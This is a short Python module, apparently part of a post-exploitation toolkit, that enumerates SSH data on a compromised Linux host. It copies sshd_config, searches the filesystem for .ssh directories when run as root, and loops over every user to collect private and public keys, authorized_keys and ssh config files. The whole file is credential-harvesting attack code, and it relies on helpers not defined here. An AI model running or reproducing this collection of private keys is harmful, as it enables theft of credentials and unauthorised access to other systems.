
'''
@description: enumerate SSH information and files on the target system.
@author: ohdae [bindshell@live.com]
'''

def enum_ssh():
    userlist = users()
    save_file('/etc/ssh/sshd_config')
    if currentuser == "root":
        status_msg("Searching for .ssh directory locations...")
        cmd_exec("find / -maxdepth 3 -name .ssh")

    status_msg("Enumerating and downloading user SSH keys..")
    for user in userlist:
        save_file("/home/%s/.ssh/id_dsa" % user)
        save_file("/home/%s/.ssh/id_dsa.pub" % user)
        save_file("/home/%s/.ssh/id_rsa" % user)
        save_file("/home/%s/.ssh/id_rsa.pub" % user)
        save_file("/home/%s/.ssh/authorized_keys" % user)
        save_file("/home/%s/.ssh/config" % user)
        save_file("%s/.ssh/id_dsa" % home)
        save_file("%s/.ssh/id_dsa.pub" % home)
        save_file("%s/.ssh/id_rsa" % home)
        save_file("%s/.ssh/id_rsa.pub" % home)
        save_file("%s/.ssh/authorized_keys" % home)
        save_file("%s/.ssh/config" % home)


enum_ssh()
